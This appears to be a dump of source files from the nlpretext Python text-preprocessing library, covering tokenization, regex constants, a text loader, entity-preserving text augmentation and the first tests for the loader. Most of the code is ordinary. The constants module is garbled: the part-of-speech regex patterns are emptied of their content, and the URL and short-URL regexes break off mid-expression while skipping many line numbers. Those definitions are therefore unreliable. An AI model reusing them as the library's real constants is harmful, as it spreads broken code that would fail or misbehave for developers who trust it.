/nlpretext/token/tokenizer.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | # mypy: disable-error-code="assignment"
19 |
20 | from typing import Any, List, Optional, Union
21 |
22 | import os
23 | import re
24 |
25 | import nltk
26 | import spacy
27 | from sacremoses import MosesDetokenizer, MosesTokenizer
28 |
29 | MODEL_REGEX = re.compile(r"^[a-z]{2}_(?:core|dep|ent|sent)_(?:web|news|wiki|ud)_(?:sm|md|lg|trf)$")
30 | SUPPORTED_LANG_MODULES = {"en_spacy", "en_nltk", "fr_spacy", "fr_moses", "ko_spacy", "ja_spacy"}
31 |
32 |
33 | class LanguageNotHandled(Exception):
34 | pass
35 |
36 |
37 | class LanguageNotInstalledError(Exception):
38 | pass
39 |
40 |
41 | class SpacyModel:
42 | class SingletonSpacyModel:
43 | def __init__(self, lang: str) -> None:
44 | self.lang = lang
45 | if lang == "en":
46 | self.model = _load_spacy_model("en_core_web_sm")
47 | elif lang == "fr":
48 | self.model = _load_spacy_model("fr_core_news_sm")
49 | elif lang == "ko":
50 | self.model = spacy.blank("ko")
51 | elif lang == "ja":
52 | self.model = spacy.blank("ja")
53 | else:
54 | raise (LanguageNotHandled("This spacy model is not available"))
55 |
56 | model: Optional[spacy.language.Language] = None
57 |
58 | def __init__(self, lang):
59 | if not SpacyModel.model:
60 | SpacyModel.model = SpacyModel.SingletonSpacyModel(lang).model
61 |
62 | def get_lang_model(self) -> Optional[str]: # noqa: D102
63 | if self.model:
64 | lang: str = self.model.lang
65 | return lang
66 | return None
67 |
68 |
69 | def _load_spacy_model(model: str) -> Any:
70 | try:
71 | return spacy.load(model)
72 | except OSError as e:
73 | if MODEL_REGEX.match(model):
74 | os.system(f"python -m spacy download {model}") # nosec
75 | return spacy.load(model)
76 | else:
77 | raise LanguageNotInstalledError(
78 | f"Model {model} is not installed. "
79 | f"To install, run: python -m spacy download {model}"
80 | ) from e
81 |
82 |
83 | def _get_spacy_tokenizer(lang: str) -> Optional[spacy.tokenizer.Tokenizer]:
84 | """
85 | Function that gets the right tokenizer given the language.
86 |
87 | Parameters
88 | ----------
89 | lang : str
90 | Language in which text is written. Languages handled : ["en", "fr", "ko", "ja"]
91 |
92 | Returns
93 | -------
94 | spacy.tokenizer.Tokenizer
95 | spacy tokenizer
96 | """
97 | model = SpacyModel(lang).model
98 | if model:
99 | return model.tokenizer
100 | return None
101 |
102 |
103 | def tokenize(text: str, lang_module: str = "en_spacy") -> List[str]:
104 | """
105 | Convert text to a list of tokens.
106 |
107 | Parameters
108 | ----------
109 | lang_module : str {'en_spacy', 'en_nltk', 'fr_spacy', 'fr_moses', 'ko_spacy', 'ja_spacy'}
110 | choose the tokenization module according to the langage and the implementation.
111 | Recommanded: Spacy (faster, better results). To process other langages
112 | import models.Spacy_models
113 |
114 | Returns
115 | -------
116 | list
117 | list of string
118 |
119 | Raises
120 | ------
121 | ValueError
122 | If lang_module is not a valid module name
123 | """
124 | if lang_module not in SUPPORTED_LANG_MODULES:
125 | raise ValueError(
126 | f"Invalid lang_module: {lang_module}. "
127 | f"lang_module must be one of {SUPPORTED_LANG_MODULES}."
128 | )
129 |
130 | tokenized_words: List[str] = []
131 | if "spacy" in lang_module:
132 | lang = lang_module.split("_")[0]
133 | spacymodel = _get_spacy_tokenizer(lang)
134 | if spacymodel:
135 | spacydoc = spacymodel(text)
136 | tokenized_words = [spacy_token.text for spacy_token in spacydoc]
137 | if lang_module == "en_nltk":
138 | tokenized_words = nltk.word_tokenize(text)
139 | if lang_module == "fr_moses":
140 | tokenized_words = MosesTokenizer(lang="fr").tokenize(text, escape=False)
141 |
142 | return tokenized_words
143 |
144 |
145 | def untokenize(tokens: List[str], lang: str = "fr") -> str:
146 | """
147 | Inputs a list of tokens output string.
148 | ["J'", 'ai'] >>> "J' ai".
149 |
150 | Parameters
151 | ----------
152 | lang : string
153 | language code
154 |
155 | Returns
156 | -------
157 | string
158 | text
159 | """
160 | d = MosesDetokenizer(lang=lang)
161 | text: str = d.detokenize(tokens, unescape=False)
162 | return text
163 |
164 |
165 | def convert_tokens_to_string(tokens_or_str: Optional[Union[str, List[str]]]) -> str: # noqa: D103
166 | if isinstance(tokens_or_str, str):
167 | return tokens_or_str
168 | if isinstance(tokens_or_str, list):
169 | return untokenize(tokens_or_str)
170 | if tokens_or_str is None:
171 | return ""
172 | raise TypeError("Please input string or tokens")
173 |
174 |
175 | def convert_string_to_tokens( # noqa: D103
176 | tokens_or_str: Optional[Union[str, List[str]]], lang_module: str = "en_spacy"
177 | ) -> List[str]:
178 | if isinstance(tokens_or_str, str):
179 | return tokenize(tokens_or_str, lang_module=lang_module)
180 | if isinstance(tokens_or_str, list):
181 | return tokens_or_str
182 | if tokens_or_str is None:
183 | return []
184 | raise TypeError("Please input string or tokens")
185 |
--------------------------------------------------------------------------------
/nlpretext/_config/constants.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 | # mypy: disable-error-code="attr-defined"
16 |
17 | """
18 | Collection of regular expressions and other (small, generally useful) constants.
19 | Credits to textacy for some of them: https://github.com/chartbeat-labs/textacy.
20 | """
21 | import re
22 | import sys
23 | import unicodedata
24 |
25 | import regex
26 |
27 | NUMERIC_NE_TYPES = {
28 | "ORDINAL",
29 | "CARDINAL",
30 | "MONEY",
31 | "QUANTITY",
32 | "PERCENT",
33 | "TIME",
34 | "DATE",
35 | }
36 | SUBJ_DEPS = {"agent", "csubj", "csubjpass", "expl", "nsubj", "nsubjpass"}
37 | OBJ_DEPS = {"attr", "dobj", "dative", "oprd"}
38 | AUX_DEPS = {"aux", "auxpass", "neg"}
39 |
40 | REPORTING_VERBS = {
41 | "according",
42 | "accuse",
43 | "acknowledge",
44 | "add",
45 | "admit",
46 | "agree",
47 | "allege",
48 | "announce",
49 | "argue",
50 | "ask",
51 | "assert",
52 | "believe",
53 | "blame",
54 | "charge",
55 | "cite",
56 | "claim",
57 | "complain",
58 | "concede",
59 | "conclude",
60 | "confirm",
61 | "contend",
62 | "criticize",
63 | "declare",
64 | "decline",
65 | "deny",
66 | "describe",
67 | "disagree",
68 | "disclose",
69 | "estimate",
70 | "explain",
71 | "fear",
72 | "hope",
73 | "insist",
74 | "maintain",
75 | "mention",
76 | "note",
77 | "observe",
78 | "order",
79 | "predict",
80 | "promise",
81 | "recall",
82 | "recommend",
83 | "reply",
84 | "report",
85 | "say",
86 | "state",
87 | "stress",
88 | "suggest",
89 | "tell",
90 | "testify",
91 | "think",
92 | "urge",
93 | "warn",
94 | "worry",
95 | "write",
96 | }
97 |
98 | CURRENCIES = {
99 | "$": "USD",
100 | "zł": "PLN",
101 | "£": "GBP",
102 | "¥": "JPY",
103 | "฿": "THB",
104 | "₡": "CRC",
105 | "₦": "NGN",
106 | "₩": "KRW",
107 | "₪": "ILS",
108 | "₫": "VND",
109 | "€": "EUR",
110 | "₱": "PHP",
111 | "₲": "PYG",
112 | "₴": "UAH",
113 | "₹": "INR",
114 | }
115 |
116 | POS_REGEX_PATTERNS = {
117 | "en": {
118 | "NP": r"? * ( ? ?)* (| ?)+",
119 | "PP": r" ? * ( ? ?)* ( ?)+",
120 | "VP": r"* * ",
121 | }
122 | }
123 |
124 | PUNCT_TRANSLATE_UNICODE = dict.fromkeys(
125 | (i for i in range(sys.maxunicode) if unicodedata.category(chr(i)).startswith("P")),
126 | " ",
127 | )
128 |
129 |
130 | ACRONYM_REGEX = re.compile(
131 | r"(?:^|(?<=\W))(?:(?:(?:(?:[A-Z]\.?)+[a-z0-9&/-]?)+(?:[A-Z][s.]?|[0-9]s?))|(?:[0-9](?:\-?[A-Z])+))(?:$|(?=\W))",
132 | flags=re.UNICODE,
133 | )
134 | EMAIL_REGEX = re.compile(
135 | r"(?:^|(?<=[^\w@.)]))([\w+-](\.(?!\.))?)*?[\w+-]@(?:\w-?)*?\w+(\.([a-z]{2,})){1,3}(?:$|(?=\b))",
136 | flags=re.IGNORECASE | re.UNICODE,
137 | )
138 | PHONE_REGEX = re.compile(
139 | r"(?:^|(?<=[^\w)]))(\+?1[ .-]?)?(\(?\d{3}\)?[ .-]?)?(\d{3}[ .-]?\d{4})(\s?(?:ext\.?|[#x-])\s?\d{2,6})?(?:$|(?=\W))" # noqa: E501
140 | )
141 | NUMBERS_REGEX = re.compile(
142 | r"(?:^|(?<=[^\w,.]))[+–-]?(([1-9]\d{0,2}(,\d{3})+(\.\d*)?)|([1-9]\d{0,2}([ .]\d{3})+(,\d*)?)|"
143 | r"(\d*?[.,]\d+)|\d+)(?:|(?=\b))"
144 | )
145 | CURRENCY_REGEX = re.compile("({})+".format("|".join(re.escape(c) for c in CURRENCIES)))
146 | LINEBREAK_REGEX = re.compile(r"((\r\n)|[\n\v])+")
147 | NONBREAKING_SPACE_REGEX = re.compile(r"(?!\n)\s+")
148 | URL_REGEX = re.compile(
149 | r"(?:|(?= 224.0.0.0
163 | # excludes network & broadcast addresses
164 | # (first & last IP address of each class)
165 | r"(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])"
166 | r"(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5])){2}"
167 | r"(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))"
168 | r"|"
169 | # host name
170 | r"(?:(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)"
171 | # domain name
172 | r"(?:\.(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)*"
173 | # TLD identifier
174 | r"(?:\.(?:[a-z\u00a1-\uffff]{2,}))" r")"
175 | # port number
176 | r"(?::\d{2,5})?"
177 | # resource path
178 | r"(?:/\S*)?" r"(?:$|(?![\w?!+&/]))",
179 | flags=re.UNICODE | re.IGNORECASE,
180 | ) # source: https://gist.github.com/dperini/729294
181 | SHORT_URL_REGEX = re.compile(
182 | r"(?:^|(?")
221 |
222 | # TEXT LOADER
223 | TEXT_FILE_FORMATS_PATTERN = re.compile(r"^.*\.(json|csv|txt|parquet)(\.gz|\.zip)*$")
224 |
--------------------------------------------------------------------------------
/nlpretext/textloader.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 | from types import ModuleType
16 | from typing import Any, List, Optional, Union
17 |
18 | import sys
19 | import warnings
20 |
21 | import pandas as pd
22 |
23 | try:
24 | from nlpretext._utils import daskloader
25 | except ImportError:
26 | warnings.warn(
27 | "Dask not found, switching to pandas. To be able to use Dask, run : pip install nlpretext[dask]", # noqa: E501
28 | stacklevel=2,
29 | )
30 |
31 | from nlpretext._utils import pandasloader
32 | from nlpretext._utils.file_loader import check_text_file_format
33 | from nlpretext.preprocessor import Preprocessor
34 |
35 |
36 | class TextLoader:
37 | def __init__(self, text_column="text", encoding="utf-8", file_format=None, use_dask=True):
38 | """
39 | Initialize DataLoader object to retrieve text data.
40 |
41 | Parameters
42 | ----------
43 | text_column: string
44 | name of the column containing texts in json / csv / parquet files
45 | encoding: string
46 | encoding of the text to be loaded, can be utf-8 or latin-1 for example
47 | file_format: string | None
48 | format of the files to be loaded
49 | use_dask: bool
50 | use dask to load text
51 | """
52 | self.text_column = text_column
53 | self.encoding = encoding
54 | self.file_format = file_format
55 |
56 | self.use_dask = use_dask
57 |
58 | self.loader: ModuleType
59 | if self.use_dask:
60 | if "dask" in sys.modules:
61 | self.loader = daskloader
62 | else:
63 | warnings.warn(
64 | "Dask is not intalled, switching to pandas. Run pip install dask to use dask",
65 | stacklevel=2,
66 | )
67 | self.use_dask = False
68 | self.loader = pandasloader
69 | else:
70 | self.loader = pandasloader
71 |
72 | def __repr__(self):
73 | """Method to represent class attributes."""
74 | class_repr_dict = {
75 | "text_column": self.text_column,
76 | "encoding": self.encoding,
77 | "file_format": self.file_format,
78 | "use_dask": self.use_dask,
79 | }
80 | return f"TextLoader({class_repr_dict})"
81 |
82 | def _read_text_txt(self, files_path):
83 | """
84 | Read txt text files stored in files_path.
85 |
86 | Parameters
87 | ----------
88 | files_path : string | list[string]
89 | single or multiple files path
90 |
91 | Returns
92 | -------
93 | dask.dataframe | pandas.DataFrame
94 | """
95 | text_ddf = self.loader.read_text(files_path, encoding=self.encoding)
96 | text_ddf.columns = [self.text_column]
97 | return text_ddf
98 |
99 | def _read_text_json(self, files_path):
100 | """
101 | Read json text files stored in files_path.
102 |
103 | Parameters
104 | ----------
105 | files_path : string | list[string]
106 | single or multiple files path
107 |
108 | Returns
109 | -------
110 | dask.dataframe | pandas.DataFrame
111 | """
112 | text_ddf = self.loader.read_json(files_path, encoding=self.encoding)
113 | try:
114 | return text_ddf[[self.text_column]]
115 | except KeyError as e:
116 | raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e
117 |
118 | def _read_text_csv(self, files_path):
119 | """
120 | Read csv text files stored in files_path.
121 |
122 | Parameters
123 | ----------
124 | files_path : string | list[string]
125 | single or multiple files path
126 |
127 | Returns
128 | -------
129 | dask.dataframe | pandas.DataFrame
130 | """
131 | text_ddf = self.loader.read_csv(files_path, encoding=self.encoding)
132 | try:
133 | return text_ddf[[self.text_column]]
134 | except KeyError as e:
135 | raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e
136 |
137 | def _read_text_parquet(self, files_path):
138 | """
139 | Read parquet text files stored in files_path.
140 |
141 | Parameters
142 | ----------
143 | files_path : string | list[string]
144 | single or multiple files path
145 |
146 | Returns
147 | -------
148 | dask.dataframe | pandas.DataFrame
149 | """
150 | text_ddf = self.loader.read_parquet(files_path, encoding=self.encoding)
151 | try:
152 | return text_ddf[[self.text_column]]
153 | except KeyError as e:
154 | raise KeyError(f"Specified text_column '{self.text_column}' not in file keys") from e
155 |
156 | def read_text(
157 | self,
158 | files_path: Union[str, List[str]],
159 | file_format: Optional[str] = None,
160 | encoding: Optional[str] = None,
161 | compute_to_pandas: bool = True,
162 | preprocessor: Optional[Preprocessor] = None,
163 | ) -> Union[pd.DataFrame, Any]:
164 | """
165 | Read the text files stored in files_path.
166 |
167 | Parameters
168 | ----------
169 | files_path: string | list[string]
170 | single or multiple files path
171 | file_format: string
172 | Format of the files to be loaded, to be selected among csv, json, parquet or txt
173 | encoding:
174 | encoding of the text to be loaded, can be utf-8 or latin-1 for example
175 | compute_to_pandas: bool
176 | True if user wants Dask Dataframe to be computed as pandas DF, False otherwise
177 | preprocessor: nlpretext.preprocessor.Preprocessor
178 | NLPretext preprocessor can be specified to pre-process text after loading
179 |
180 | Returns
181 | -------
182 | dask.dataframe | pandas.DataFrame
183 | """
184 | if encoding is not None:
185 | self.encoding = encoding
186 |
187 | if file_format is not None:
188 | self.file_format = file_format
189 | else:
190 | self.file_format = check_text_file_format(files_path)
191 |
192 | reader_mapping = {
193 | "csv": self._read_text_csv,
194 | "txt": self._read_text_txt,
195 | "json": self._read_text_json,
196 | "parquet": self._read_text_parquet,
197 | }
198 | reader = reader_mapping.get(self.file_format)
199 | if reader is None:
200 | raise ValueError("Format not handled")
201 | text = reader(files_path)
202 |
203 | if preprocessor is not None:
204 | if isinstance(preprocessor, Preprocessor):
205 | print(f"before: {text.head()}")
206 | text[self.text_column] = text[self.text_column].apply(preprocessor.run)
207 | print(f"after: {text.head()}")
208 | else:
209 | raise ValueError("Only NLPretext preprocessors can be specified")
210 |
211 | if compute_to_pandas and self.use_dask:
212 | return text.compute()
213 | return text
214 |
--------------------------------------------------------------------------------
/nlpretext/augmentation/text_augmentation.py:
--------------------------------------------------------------------------------
1 | from typing import Any, Dict, List, Optional, Tuple
2 |
3 | import logging
4 | import re
5 | from itertools import combinations
6 |
7 | import nlpaug.augmenter.word as naw
8 |
9 |
10 | class CouldNotAugment(ValueError): # noqa: D101
11 | pass
12 |
13 |
14 | class UnavailableAugmenter(ValueError): # noqa: D101
15 | pass
16 |
17 |
18 | def augment_text(
19 | text: str,
20 | method: str,
21 | stopwords: Optional[List[str]] = None,
22 | entities: Optional[List[Dict[str, Any]]] = None,
23 | ) -> Tuple[str, List[Dict[str, Any]]]:
24 | """
25 | Given a text with or without associated entities, generate a new text by
26 | modifying some words in the initial one, modifications depend on the chosen
27 | method (substitution with synonym, addition, deletion). If entities are
28 | given as input, they will remain unchanged. If you want some words other
29 | than entities to remain unchanged, specify it within the stopwords argument.
30 |
31 | Parameters
32 | ----------
33 | text : string
34 | method : {'wordnet_synonym', 'aug_sub_bert'}
35 | augmenter to use ('wordnet_synonym' or 'aug_sub_bert')
36 | stopwords : list, optional
37 | list of words to freeze throughout the augmentation
38 | entities : list, optional
39 | entities associated to text if any, must be in the following format:
40 | [
41 | {
42 | 'entity': str,
43 | 'word': str,
44 | 'startCharIndex': int,
45 | 'endCharIndex': int
46 | },
47 | {
48 | ...
49 | }
50 | ]
51 |
52 | Returns
53 | -------
54 | Augmented text and optional augmented entities
55 | """
56 | augmenter = get_augmenter(method, stopwords)
57 | augmented_text = augmenter.augment(text)
58 | if entities is not None:
59 | return process_entities_and_text(entities, text, augmented_text)
60 | return augmented_text, []
61 |
62 |
63 | def process_entities_and_text(
64 | entities: List[Dict[str, Any]], text: str, augmented_text: str
65 | ) -> Tuple[str, List[Dict[str, Any]]]:
66 | """
67 | Given a list of initial entities, verify that they have not been altered by
68 | the data augmentation operation and are still in the augmented text.
69 |
70 | Parameters
71 | ----------
72 | entities: list
73 | entities associated to text, must be in the following format:
74 | [
75 | {
76 | 'entity': str,
77 | 'word': str,
78 | 'startCharIndex': int,
79 | 'endCharIndex': int
80 | },
81 | {
82 | ...
83 | }
84 | ]
85 | text: str
86 | initial text
87 | augmented_text: str
88 | new text resulting of data augmentation operation
89 |
90 | Returns
91 | -------
92 | Augmented text and entities with their updated position in augmented text
93 | """
94 | formatted_entities = [
95 | (
96 | text[entities[i]["startCharIndex"] : entities[i]["endCharIndex"]].strip(),
97 | entities[i]["entity"],
98 | )
99 | for i in range(len(entities))
100 | ]
101 | if are_entities_in_augmented_text(entities, augmented_text):
102 | augmented_entities = get_augmented_entities(augmented_text, formatted_entities)
103 | clean_entities = clean_sentence_entities(augmented_text, augmented_entities)
104 | return augmented_text, clean_entities
105 | raise CouldNotAugment("Text was not correctly augmented because entities were altered")
106 |
107 |
108 | def are_entities_in_augmented_text(entities: List[Dict[str, Any]], augmented_text: str) -> bool:
109 | """
110 | Given a list of entities, check if all the words associated to each entity
111 | are still present in augmented text.
112 |
113 | Parameters
114 | ----------
115 | entities : list
116 | entities associated to initial text, must be in the following format:
117 | [
118 | {
119 | 'entity': str,
120 | 'word': str,
121 | 'startCharIndex': int,
122 | 'endCharIndex': int
123 | },
124 | {
125 | ...
126 | }
127 | ]
128 | augmented_text : str
129 |
130 | Returns
131 | -------
132 | True if all entities are present in augmented text, False otherwise
133 | """
134 | check = True
135 | for ent in entities:
136 | if ent["word"] not in augmented_text:
137 | check = False
138 | return check
139 | return check
140 |
141 |
142 | def get_augmenter(method: str, stopwords: Optional[List[str]] = None) -> naw.SynonymAug:
143 | """
144 | Initialize an augmenter depending on the given method.
145 |
146 | Parameters
147 | ----------
148 | method : str (supported methods: wordnet_synonym and aug_sub_bert)
149 | stopwords : list
150 | list of words to freeze throughout the augmentation
151 |
152 | Returns
153 | -------
154 | Initialized nlpaug augmenter
155 | """
156 | if method == "wordnet_synonym":
157 | return naw.SynonymAug(aug_src="wordnet", stopwords=stopwords)
158 | if method == "aug_sub_bert":
159 | return naw.ContextualWordEmbsAug(
160 | model_path="bert-base-uncased", action="substitute", stopwords=stopwords
161 | )
162 | raise UnavailableAugmenter(
163 | "The given augmenter is not supported. You must choose one \
164 | of the following: wordnet_synonym or aug_sub_bert"
165 | )
166 |
167 |
168 | def get_augmented_entities(
169 | sentence_augmented: str, entities: List[Tuple[str, Any]]
170 | ) -> List[Dict[str, Any]]:
171 | """
172 | Get entities with updated positions (start and end) in augmented text.
173 |
174 | Parameters
175 | ----------
176 | sentence_augmented : str
177 | augmented text
178 | entities : list
179 | entities associated to initial text, must be in the following format:
180 | [
181 | {
182 | 'entity': str,
183 | 'word': str,
184 | 'startCharIndex': int,
185 | 'endCharIndex': int
186 | },
187 | {
188 | ...
189 | }
190 | ]
191 |
192 | Returns
193 | -------
194 | Entities with updated positions related to augmented text
195 | """
196 | entities_augmented = []
197 | for entity in entities:
198 | search = re.search(entity[0].strip(), sentence_augmented)
199 | if search:
200 | start_index = search.start()
201 | end_index = search.end()
202 | new_entity = {
203 | "entity": entity[1],
204 | "word": sentence_augmented[start_index:end_index],
205 | "startCharIndex": start_index,
206 | "endCharIndex": end_index,
207 | }
208 | entities_augmented.append(new_entity)
209 | return entities_augmented
210 |
211 |
212 | def clean_sentence_entities(text: str, entities: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
213 | """
214 | Paired entities check to remove nested entities, the longest entity is kept.
215 |
216 | Parameters
217 | ----------
218 | text : str
219 | augmented text
220 | entities : list
221 | entities associated to augmented text, must be in the following format:
222 | [
223 | {
224 | 'entity': str,
225 | 'word': str,
226 | 'startCharIndex': int,
227 | 'endCharIndex': int
228 | },
229 | {
230 | ...
231 | }
232 | ]
233 |
234 | Returns
235 | -------
236 | Cleaned entities
237 | """
238 | entities_to_clean = [dict(s) for s in {frozenset(d.items()) for d in entities}]
239 | for element1, element2 in combinations(entities_to_clean, 2):
240 | result = check_interval_included(element1, element2)
241 | if result is not None:
242 | try:
243 | entities_to_clean.remove(result[0])
244 | except IndexError:
245 | logging.warning(
246 | "Cant remove entity : {} \n entities are now :{} \n for sentence : {} ".format(
247 | result, entities_to_clean, text
248 | )
249 | )
250 | continue
251 | return entities_to_clean
252 |
253 |
254 | def check_interval_included(
255 | element1: Dict[str, Any], element2: Dict[str, Any]
256 | ) -> Optional[Tuple[Dict[str, Any], Dict[str, Any]]]:
257 | """
258 | Comparison of two entities on start and end positions to find if they are nested.
259 |
260 | Parameters
261 | ----------
262 | element1 : dict
263 | element2 : dict
264 | both of them in the following format
265 | {
266 | 'entity': str,
267 | 'word': str,
268 | 'startCharIndex': int,
269 | 'endCharIndex': int
270 | }
271 |
272 | Returns
273 | -------
274 | If there is an entity to remove among the two returns a tuple
275 | (element to remove, element to keep).
276 | If not, returns None
277 | """
278 | if (
279 | (element1 != element2)
280 | and (element1["startCharIndex"] >= element2["startCharIndex"])
281 | and (element1["endCharIndex"] <= element2["endCharIndex"])
282 | ):
283 | return element1, element2
284 | if (
285 | (element1 != element2)
286 | and (element2["startCharIndex"] >= element1["startCharIndex"])
287 | and (element2["endCharIndex"] <= element1["endCharIndex"])
288 | ):
289 | return element2, element1
290 | if (
291 | (element1 != element2)
292 | and (element1["startCharIndex"] >= element2["startCharIndex"])
293 | and (element1["endCharIndex"] >= element2["endCharIndex"])
294 | and (element1["startCharIndex"] <= element2["endCharIndex"] - 1)
295 | ):
296 | return element1, element2
297 | if (
298 | (element1 != element2)
299 | and (element2["startCharIndex"] >= element1["startCharIndex"])
300 | and (element2["endCharIndex"] >= element1["endCharIndex"])
301 | and (element2["startCharIndex"] < element1["endCharIndex"] - 1)
302 | ):
303 | return element2, element1
304 | return None
305 |
--------------------------------------------------------------------------------
/tests/test_textloader.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | # mypy: disable-error-code="attr-defined"
19 |
20 | from pathlib import Path
21 | from unittest.mock import MagicMock, patch
22 |
23 | try:
24 | import dask.bag as db
25 | import dask.dataframe as dd
26 | except ImportError as e:
27 | raise ImportError("please install dask: pip install dask[complete]") from e
28 |
29 | try:
30 | import pandas as pd
31 | except ImportError as e:
32 | raise ImportError("please install pandas: pip install pandas") from e
33 |
34 | import pytest
35 | from nlpretext.preprocessor import Preprocessor
36 | from nlpretext.textloader import TextLoader
37 | from pandas.testing import assert_frame_equal
38 |
39 | # pylint: disable=protected-access
40 |
41 |
42 | @patch("dask.bag.read_text")
43 | def test__read_text_txt_dask(mock_read_text):
44 | # Given
45 | files_path = "some_path/to_read.txt"
46 | file_format = "txt"
47 | encoding = "utf-8"
48 | text_column = "text"
49 | mock_read_text.return_value = db.from_sequence(["This is a text \n", "This is another text \n"])
50 |
51 | expected_result = dd.from_pandas(
52 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
53 | npartitions=2,
54 | )
55 |
56 | # When
57 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
58 | actual_result = dummy_instance._read_text_txt(files_path)
59 |
60 | # Then
61 | mock_read_text.assert_called_once_with(files_path, encoding=encoding)
62 | assert_frame_equal(expected_result.compute(), actual_result.compute().reset_index(drop=True))
63 |
64 |
65 | @patch("pandas.read_fwf")
66 | def test__read_text_txt_pandas(mock_read_text):
67 | # Given
68 | files_path = "some_path/to_read.txt"
69 | file_format = "txt"
70 | encoding = "utf-8"
71 | text_column = "text"
72 | mock_read_text.return_value = pd.DataFrame(
73 | {text_column: ["This is a text", "This is another text"]}
74 | )
75 |
76 | expected_result = pd.DataFrame({text_column: ["This is a text", "This is another text"]})
77 |
78 | # When
79 | dummy_instance = TextLoader(
80 | file_format=file_format,
81 | use_dask=False,
82 | encoding=encoding,
83 | text_column=text_column,
84 | )
85 | actual_result = dummy_instance._read_text_txt(files_path)
86 |
87 | # Then
88 | mock_read_text.assert_called_once_with(
89 | str(Path(files_path).absolute()), encoding=encoding, colspecs=[(None, None)]
90 | )
91 | assert_frame_equal(expected_result, actual_result.reset_index(drop=True))
92 |
93 |
94 | @patch("nlpretext._utils.daskloader.dd")
95 | def test__read_text_json_dask(mock_read):
96 | # Given
97 | files_path = "some_path/to_read.json"
98 | file_format = "json"
99 | encoding = "utf-8"
100 | text_column = "text"
101 |
102 | text_ddf = dd.from_pandas(
103 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
104 | npartitions=2,
105 | )
106 | mock_read.read_json.return_value = text_ddf
107 |
108 | expected_result = text_ddf[[text_column]]
109 |
110 | # When
111 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
112 | actual_result = dummy_instance._read_text_json(files_path)
113 |
114 | # Then
115 | mock_read.read_json.assert_called_once_with(files_path, encoding=encoding)
116 | assert_frame_equal(expected_result.compute(), actual_result.compute())
117 |
118 |
119 | @patch("nlpretext._utils.pandasloader.read_json")
120 | def test__read_text_json_pandas(mock_read):
121 | # Given
122 | files_path = "some_path/to_read.txt"
123 | file_format = "txt"
124 | encoding = "utf-8"
125 | text_column = "text"
126 |
127 | dummy_instance = TextLoader(
128 | file_format=file_format,
129 | use_dask=False,
130 | encoding=encoding,
131 | text_column=text_column,
132 | )
133 | dummy_instance._read_text_json(files_path)
134 |
135 | # Then
136 | mock_read.assert_called_once_with(files_path, encoding=encoding)
137 |
138 |
139 | @patch("dask.dataframe.read_csv")
140 | def test__read_text_csv_dask(mock_read_csv):
141 | # Given
142 | files_path = "some_path/to_read.csv"
143 | file_format = "csv"
144 | encoding = "utf-8"
145 | text_column = "text"
146 |
147 | text_ddf = dd.from_pandas(
148 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
149 | npartitions=2,
150 | )
151 | mock_read_csv.return_value = text_ddf
152 |
153 | expected_result = text_ddf[[text_column]]
154 |
155 | # When
156 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
157 | actual_result = dummy_instance._read_text_csv(files_path)
158 |
159 | # Then
160 | mock_read_csv.assert_called_once_with(files_path, encoding=encoding)
161 | assert_frame_equal(expected_result.compute(), actual_result.compute())
162 |
163 |
